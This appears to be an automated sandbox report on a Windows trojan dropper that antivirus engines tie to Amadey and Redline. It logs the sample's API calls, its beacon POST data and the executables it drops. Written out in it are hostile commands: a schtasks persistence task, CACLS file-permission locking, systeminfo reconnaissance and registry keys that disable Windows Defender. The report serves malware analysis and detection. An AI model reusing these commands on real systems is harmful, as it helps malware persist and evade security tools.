HttpSendRequestA March 30, 2023, 4:28 p.m.	headers: Content-Type: application/x-www-form-urlencoded request_handle: 0x00cc000c post_data: id=832866432405&vs=3.69&sd=d5c6a6&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1	1	1
HttpSendRequestA March 30, 2023, 4:28 p.m.	headers: Content-Type: application/x-www-form-urlencoded request_handle: 0x00cc000c post_data: id=832866432405&vs=3.69&sd=d5c6a6&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1	1	1
HttpSendRequestA March 30, 2023, 4:28 p.m.	headers: Content-Type: application/x-www-form-urlencoded request_handle: 0x00cc000c post_data: id=832866432405&vs=3.69&sd=d5c6a6&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1	1	1
HttpSendRequestA March 30, 2023, 4:28 p.m.	headers: Content-Type: application/x-www-form-urlencoded request_handle: 0x00cc000c post_data: id=832866432405&vs=3.69&sd=d5c6a6&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1	1	1
HttpSendRequestA March 30, 2023, 4:28 p.m.	headers: Content-Type: application/x-www-form-urlencoded request_handle: 0x00cc000c post_data: id=832866432405&vs=3.69&sd=d5c6a6&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1	1	1

Resumed a suspended thread in a remote process potentially indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2188 resumed a thread in remote process 2484
NtResumeThread March 30, 2023, 4:28 p.m.	thread_handle: 0x00000278 suspend_count: 1 process_identifier: 2484	1	0	0

Uses suspicious command line tools or Windows utilities (6 events)

cmdline	"C:\Windows\System32\cmd.exe" /k echo Y\|CACLS "oneetx.exe" /P "test22:N"&&CACLS "oneetx.exe" /P "test22:R" /E&&echo Y\|CACLS "..\c5d2db5804" /P "test22:N"&&CACLS "..\c5d2db5804" /P "test22:R" /E&&Exit
cmdline	CACLS "..\c5d2db5804" /P "test22:N"
cmdline	cmd /k echo Y\|CACLS "oneetx.exe" /P "test22:N"&&CACLS "oneetx.exe" /P "test22:R" /E&&echo Y\|CACLS "..\c5d2db5804" /P "test22:N"&&CACLS "..\c5d2db5804" /P "test22:R" /E&&Exit
cmdline	CACLS "oneetx.exe" /P "test22:N"
cmdline	CACLS "..\c5d2db5804" /P "test22:R" /E
cmdline	CACLS "oneetx.exe" /P "test22:R" /E

Collects information on the system (ipconfig, netstat, systeminfo) (1 event)

cmdline

cmd "/c " systeminfo

Detects the presence of Wine emulator (1 event)

Time & API	Arguments	Status	Return	Repeated
LdrGetProcedureAddress March 30, 2023, 4:28 p.m.	ordinal: 0 function_address: 0x0018fe55 function_name: wine_get_version module: ntdll module_address: 0x778a0000		3221225785	0

Disables Windows Security features (6 events)

description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection
description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable
description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring
description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware
description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring
description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection

Executed a process and injected code into it, probably while unpacking (50 out of 330 events)

Time & API	Arguments	Status	Return
CreateProcessInternalW March 30, 2023, 4:27 p.m.	thread_identifier: 2136 thread_handle: 0x0000001c process_identifier: 2132 current_directory: filepath: track: 1 command_line: C:\Users\test22\AppData\Local\Temp\IXP000.TMP\zap6859.exe filepath_r: stack_pivoted: 0 creation_flags: 524320 (EXTENDED_STARTUPINFO_PRESENT\|NORMAL_PRIORITY_CLASS) inherit_handles: 0 process_handle: 0x00000128	1	1
CreateProcessInternalW March 30, 2023, 4:28 p.m.	thread_identifier: 2092 thread_handle: 0x00000128 process_identifier: 2088 current_directory: filepath: track: 1 command_line: C:\Users\test22\AppData\Local\Temp\IXP000.TMP\y53BD64.exe filepath_r: stack_pivoted: 0 creation_flags: 524320 (EXTENDED_STARTUPINFO_PRESENT\|NORMAL_PRIORITY_CLASS) inherit_handles: 0 process_handle: 0x0000001c	1	1
CreateProcessInternalW March 30, 2023, 4:27 p.m.	thread_identifier: 2180 thread_handle: 0x0000001c process_identifier: 2176 current_directory: filepath: track: 1 command_line: C:\Users\test22\AppData\Local\Temp\IXP001.TMP\zap9306.exe filepath_r: stack_pivoted: 0 creation_flags: 524320 (EXTENDED_STARTUPINFO_PRESENT\|NORMAL_PRIORITY_CLASS) inherit_handles: 0 process_handle: 0x00000128	1	1
CreateProcessInternalW March 30, 2023, 4:28 p.m.	thread_identifier: 2860 thread_handle: 0x00000128 process_identifier: 2856 current_directory: filepath: track: 1 command_line: C:\Users\test22\AppData\Local\Temp\IXP001.TMP\xnmXr68.exe filepath_r: stack_pivoted: 0 creation_flags: 524320 (EXTENDED_STARTUPINFO_PRESENT\|NORMAL_PRIORITY_CLASS) inherit_handles: 0 process_handle: 0x0000001c	1	1
CreateProcessInternalW March 30, 2023, 4:27 p.m.	thread_identifier: 2248 thread_handle: 0x0000001c process_identifier: 2244 current_directory: filepath: track: 1 command_line: C:\Users\test22\AppData\Local\Temp\IXP002.TMP\zap5462.exe filepath_r: stack_pivoted: 0 creation_flags: 524320 (EXTENDED_STARTUPINFO_PRESENT\|NORMAL_PRIORITY_CLASS) inherit_handles: 0 process_handle: 0x00000128	1	1
CreateProcessInternalW March 30, 2023, 4:28 p.m.	thread_identifier: 2808 thread_handle: 0x00000128 process_identifier: 2804 current_directory: filepath: track: 1 command_line: C:\Users\test22\AppData\Local\Temp\IXP002.TMP\w78XP44.exe filepath_r: stack_pivoted: 0 creation_flags: 524320 (EXTENDED_STARTUPINFO_PRESENT\|NORMAL_PRIORITY_CLASS) inherit_handles: 0 process_handle: 0x0000001c	1	1
CreateProcessInternalW March 30, 2023, 4:27 p.m.	thread_identifier: 2316 thread_handle: 0x0000001c process_identifier: 2312 current_directory: filepath: track: 1 command_line: C:\Users\test22\AppData\Local\Temp\IXP003.TMP\tz9648.exe filepath_r: stack_pivoted: 0 creation_flags: 524320 (EXTENDED_STARTUPINFO_PRESENT\|NORMAL_PRIORITY_CLASS) inherit_handles: 0 process_handle: 0x00000128	1	1
CreateProcessInternalW March 30, 2023, 4:28 p.m.	thread_identifier: 2760 thread_handle: 0x00000128 process_identifier: 2756 current_directory: filepath: track: 1 command_line: C:\Users\test22\AppData\Local\Temp\IXP003.TMP\v7412DB.exe filepath_r: stack_pivoted: 0 creation_flags: 524320 (EXTENDED_STARTUPINFO_PRESENT\|NORMAL_PRIORITY_CLASS) inherit_handles: 0 process_handle: 0x0000001c	1	1
NtResumeThread March 30, 2023, 4:27 p.m.	thread_handle: 0x000000000000012c suspend_count: 1 process_identifier: 2312	1	0
NtResumeThread March 30, 2023, 4:27 p.m.	thread_handle: 0x000000000000019c suspend_count: 1 process_identifier: 2312	1	0
NtResumeThread March 30, 2023, 4:27 p.m.	thread_handle: 0x00000000000001dc suspend_count: 1 process_identifier: 2312	1	0
NtResumeThread March 30, 2023, 4:28 p.m.	thread_handle: 0x00000188 suspend_count: 1 process_identifier: 2856	1	0
NtResumeThread March 30, 2023, 4:28 p.m.	thread_handle: 0x000001fc suspend_count: 1 process_identifier: 2856	1	0
NtResumeThread March 30, 2023, 4:28 p.m.	thread_handle: 0x00000244 suspend_count: 1 process_identifier: 2856	1	0
NtResumeThread March 30, 2023, 4:28 p.m.	thread_handle: 0x000002f8 suspend_count: 1 process_identifier: 2856	1	0
NtGetContextThread March 30, 2023, 4:28 p.m.	thread_handle: 0x0000018c	1	0
NtGetContextThread March 30, 2023, 4:28 p.m.	thread_handle: 0x0000018c	1	0
NtResumeThread March 30, 2023, 4:28 p.m.	thread_handle: 0x0000018c suspend_count: 1 process_identifier: 2856	1	0
CreateProcessInternalW March 30, 2023, 4:28 p.m.	thread_identifier: 508 thread_handle: 0x00000358 process_identifier: 1208 current_directory: C:\Users\test22\AppData\Local\Temp\IXP000.TMP filepath: C:\Users\test22\AppData\Local\Temp\c5d2db5804\oneetx.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\c5d2db5804\oneetx.exe" filepath_r: C:\Users\test22\AppData\Local\Temp\c5d2db5804\oneetx.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000360	1	1
NtResumeThread March 30, 2023, 4:28 p.m.	thread_handle: 0x00000278 suspend_count: 1 process_identifier: 1208	1	0
CreateProcessInternalW March 30, 2023, 4:28 p.m.	thread_identifier: 2080 thread_handle: 0x0000029c process_identifier: 2120 current_directory: C:\Users\test22\AppData\Local\Temp\IXP000.TMP filepath: C:\Windows\System32\schtasks.exe track: 1 command_line: "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\test22\AppData\Local\Temp\c5d2db5804\oneetx.exe" /F filepath_r: C:\Windows\System32\schtasks.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x000002a4	1	1
CreateProcessInternalW March 30, 2023, 4:28 p.m.	thread_identifier: 2500 thread_handle: 0x00000234 process_identifier: 2512 current_directory: C:\Users\test22\AppData\Local\Temp\c5d2db5804 filepath: C:\Windows\System32\cmd.exe track: 1 command_line: "C:\Windows\System32\cmd.exe" /k echo Y\|CACLS "oneetx.exe" /P "test22:N"&&CACLS "oneetx.exe" /P "test22:R" /E&&echo Y\|CACLS "..\c5d2db5804" /P "test22:N"&&CACLS "..\c5d2db5804" /P "test22:R" /E&&Exit filepath_r: C:\Windows\System32\cmd.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x000002a8	1	1
CreateProcessInternalW March 30, 2023, 4:28 p.m.	thread_identifier: 2920 thread_handle: 0x000003e4 process_identifier: 2904 current_directory: C:\Users\test22\AppData\Local\Temp\c5d2db5804 filepath: C:\Users\test22\AppData\Local\Temp\1000003001\123dsss.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\1000003001\123dsss.exe" filepath_r: C:\Users\test22\AppData\Local\Temp\1000003001\123dsss.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000410	1	1
CreateProcessInternalW March 30, 2023, 4:28 p.m.	thread_identifier: 2300 thread_handle: 0x0000038c process_identifier: 2188 current_directory: C:\Users\test22\AppData\Local\Temp\c5d2db5804 filepath: C:\Users\test22\AppData\Local\Temp\1000004001\Tarlatan.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\1000004001\Tarlatan.exe" filepath_r: C:\Users\test22\AppData\Local\Temp\1000004001\Tarlatan.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x0000040c	1	1
CreateProcessInternalW March 30, 2023, 4:28 p.m.	thread_identifier: 2868 thread_handle: 0x0000037c process_identifier: 2876 current_directory: C:\Users\test22\AppData\Local\Temp\c5d2db5804 filepath: C:\Users\test22\AppData\Local\Temp\1000007001\Gmeyad.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\1000007001\Gmeyad.exe" filepath_r: C:\Users\test22\AppData\Local\Temp\1000007001\Gmeyad.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000414	1	1
CreateProcessInternalW March 30, 2023, 4:28 p.m.	thread_identifier: 2668 thread_handle: 0x000003f8 process_identifier: 2716 current_directory: C:\Users\test22\AppData\Local\Temp\c5d2db5804 filepath: C:\Users\test22\AppData\Local\Temp\1000011001\2023.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\1000011001\2023.exe" filepath_r: C:\Users\test22\AppData\Local\Temp\1000011001\2023.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000420	1	1
CreateProcessInternalW March 30, 2023, 4:28 p.m.	thread_identifier: 524 thread_handle: 0x00000390 process_identifier: 1684 current_directory: C:\Users\test22\AppData\Local\Temp\c5d2db5804 filepath: C:\Users\test22\AppData\Local\Temp\1000012001\w.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\1000012001\w.exe" filepath_r: C:\Users\test22\AppData\Local\Temp\1000012001\w.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000418	1	1
CreateProcessInternalW March 30, 2023, 4:28 p.m.	thread_identifier: 3040 thread_handle: 0x0000040c process_identifier: 3032 current_directory: C:\Users\test22\AppData\Local\Temp\c5d2db5804 filepath: C:\Users\test22\AppData\Local\Temp\1000017001\tmpBEB8.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\1000017001\tmpBEB8.exe" filepath_r: C:\Users\test22\AppData\Local\Temp\1000017001\tmpBEB8.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000424	1	1
CreateProcessInternalW March 30, 2023, 4:29 p.m.	thread_identifier: 3360 thread_handle: 0x00000440 process_identifier: 3356 current_directory: C:\Users\test22\AppData\Local\Temp\c5d2db5804 filepath: C:\Windows\System32\rundll32.exe track: 1 command_line: "C:\Windows\System32\rundll32.exe" C:\Users\test22\AppData\Roaming\a091ec0a6e2227\clip64.dll, Main filepath_r: C:\Windows\System32\rundll32.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000458	1	1
CreateProcessInternalW March 30, 2023, 4:28 p.m.	thread_identifier: 2792 thread_handle: 0x00000140 process_identifier: 2784 current_directory: C:\Users\test22\AppData\Local\Temp\c5d2db5804 filepath: C:\Windows\System32\cmd.exe track: 1 command_line: C:\Windows\system32\cmd.exe /S /D /c" echo Y" filepath_r: C:\Windows\system32\cmd.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000148	1	1
CreateProcessInternalW March 30, 2023, 4:28 p.m.	thread_identifier: 288 thread_handle: 0x0000013c process_identifier: 2840 current_directory: C:\Users\test22\AppData\Local\Temp\c5d2db5804 filepath: C:\Windows\System32\cacls.exe track: 1 command_line: CACLS "oneetx.exe" /P "test22:N" filepath_r: C:\Windows\system32\cacls.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000140	1	1
CreateProcessInternalW March 30, 2023, 4:28 p.m.	thread_identifier: 2180 thread_handle: 0x00000140 process_identifier: 2216 current_directory: C:\Users\test22\AppData\Local\Temp\c5d2db5804 filepath: C:\Windows\System32\cacls.exe track: 1 command_line: CACLS "oneetx.exe" /P "test22:R" /E filepath_r: C:\Windows\system32\cacls.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000148	1	1
CreateProcessInternalW March 30, 2023, 4:28 p.m.	thread_identifier: 2428 thread_handle: 0x00000140 process_identifier: 2412 current_directory: C:\Users\test22\AppData\Local\Temp\c5d2db5804 filepath: C:\Windows\System32\cmd.exe track: 1 command_line: C:\Windows\system32\cmd.exe /S /D /c" echo Y" filepath_r: C:\Windows\system32\cmd.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000144	1	1
CreateProcessInternalW March 30, 2023, 4:28 p.m.	thread_identifier: 2712 thread_handle: 0x00000148 process_identifier: 2720 current_directory: C:\Users\test22\AppData\Local\Temp\c5d2db5804 filepath: C:\Windows\System32\cacls.exe track: 1 command_line: CACLS "..\c5d2db5804" /P "test22:N" filepath_r: C:\Windows\system32\cacls.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000140	1	1
CreateProcessInternalW March 30, 2023, 4:28 p.m.	thread_identifier: 3028 thread_handle: 0x00000140 process_identifier: 3016 current_directory: C:\Users\test22\AppData\Local\Temp\c5d2db5804 filepath: C:\Windows\System32\cacls.exe track: 1 command_line: CACLS "..\c5d2db5804" /P "test22:R" /E filepath_r: C:\Windows\system32\cacls.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000144	1	1
NtResumeThread March 30, 2023, 4:28 p.m.	thread_handle: 0x0000016c suspend_count: 1 process_identifier: 2840	1	0
NtResumeThread March 30, 2023, 4:28 p.m.	thread_handle: 0x00000168 suspend_count: 1 process_identifier: 2216	1	0
NtResumeThread March 30, 2023, 4:28 p.m.	thread_handle: 0x0000016c suspend_count: 1 process_identifier: 2720	1	0
NtResumeThread March 30, 2023, 4:28 p.m.	thread_handle: 0x00000164 suspend_count: 1 process_identifier: 3016	1	0
NtResumeThread March 30, 2023, 4:28 p.m.	thread_handle: 0x00000188 suspend_count: 1 process_identifier: 2904	1	0
NtResumeThread March 30, 2023, 4:28 p.m.	thread_handle: 0x000001fc suspend_count: 1 process_identifier: 2904	1	0
NtResumeThread March 30, 2023, 4:28 p.m.	thread_handle: 0x0000023c suspend_count: 1 process_identifier: 2904	1	0
NtResumeThread March 30, 2023, 4:28 p.m.	thread_handle: 0x0000027c suspend_count: 1 process_identifier: 2904	1	0
NtGetContextThread March 30, 2023, 4:28 p.m.	thread_handle: 0x00000190	1	0
NtGetContextThread March 30, 2023, 4:28 p.m.	thread_handle: 0x00000190	1	0
NtResumeThread March 30, 2023, 4:28 p.m.	thread_handle: 0x00000190 suspend_count: 1 process_identifier: 2904	1	0
NtResumeThread March 30, 2023, 4:28 p.m.	thread_handle: 0x00000188 suspend_count: 1 process_identifier: 2188	1	0
NtResumeThread March 30, 2023, 4:28 p.m.	thread_handle: 0x000001f8 suspend_count: 1 process_identifier: 2188	1	0
NtResumeThread March 30, 2023, 4:28 p.m.	thread_handle: 0x00000248 suspend_count: 1 process_identifier: 2188	1	0
CreateProcessInternalW March 30, 2023, 4:28 p.m.	thread_identifier: 2684 thread_handle: 0x00000278 process_identifier: 2484 current_directory: filepath: track: 1 command_line: C:\Users\test22\AppData\Local\Temp\1000004001\Tarlatan.exe filepath_r: stack_pivoted: 0 creation_flags: 134217740 (CREATE_NO_WINDOW\|CREATE_SUSPENDED\|DETACHED_PROCESS) inherit_handles: 0 process_handle: 0x00000280	1	1

File has been identified by 36 AntiVirus engines on VirusTotal as malicious (36 events)

Elastic	malicious (high confidence)
CAT-QuickHeal	Trojan.YakbeexMSIL.ZZ4
McAfee	Artemis!1BA9E75D2B91
Malwarebytes	Generic.Trojan.Injector.DDS
K7GW	Riskware ( 0040eff71 )
Cyren	W32/KillAV.KMEF-6536
Symantec	ML.Attribute.HighConfidence
ESET-NOD32	multiple detections
Cynet	Malicious (score: 99)
APEX	Malicious
ClamAV	Win.Trojan.Generic-9933689-0
Kaspersky	HEUR:Trojan.MSIL.Agent.gen
NANO-Antivirus	Trojan.Win32.Disabler.jvcmgw
SUPERAntiSpyware	Trojan.Agent/Gen-Downloader
Avast	Win32:TrojanX-gen [Trj]
Tencent	Trojan.MSIL.Agent.hg
DrWeb	Trojan.Siggen19.32857
VIPRE	Trojan.GenericKD.65331035
TrendMicro	TROJ_GEN.R002C0PC223
McAfee-GW-Edition	BehavesLike.Win32.Dropper.dc
Trapmine	malicious.high.ml.score
SentinelOne	Static AI - Malicious SFX
Jiangmin	Trojan.MSIL.aocbf
Avira	TR/ATRAPS.Gen
Antiy-AVL	Trojan/Script.Phonzy
Microsoft	Trojan:Script/Phonzy.A!ml
GData	MSIL.Trojan-Stealer.Redline.G
Google	Detected
ALYac	Gen:Variant.Zusy.445801
Cylance	unsafe
TrendMicro-HouseCall	TROJ_GEN.R002C0PC223
Rising	Trojan.Generic@AI.100 (RDML:3wj1xRRT2o/S0lJ8lpodlw)
Yandex	Trojan.Disabler!G6z7qDxyklM
Ikarus	Trojan-Downloader.Win32.Amadey
Fortinet	MSIL/Disabler.DR!tr
AVG	Win32:TrojanX-gen [Trj]

lega.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All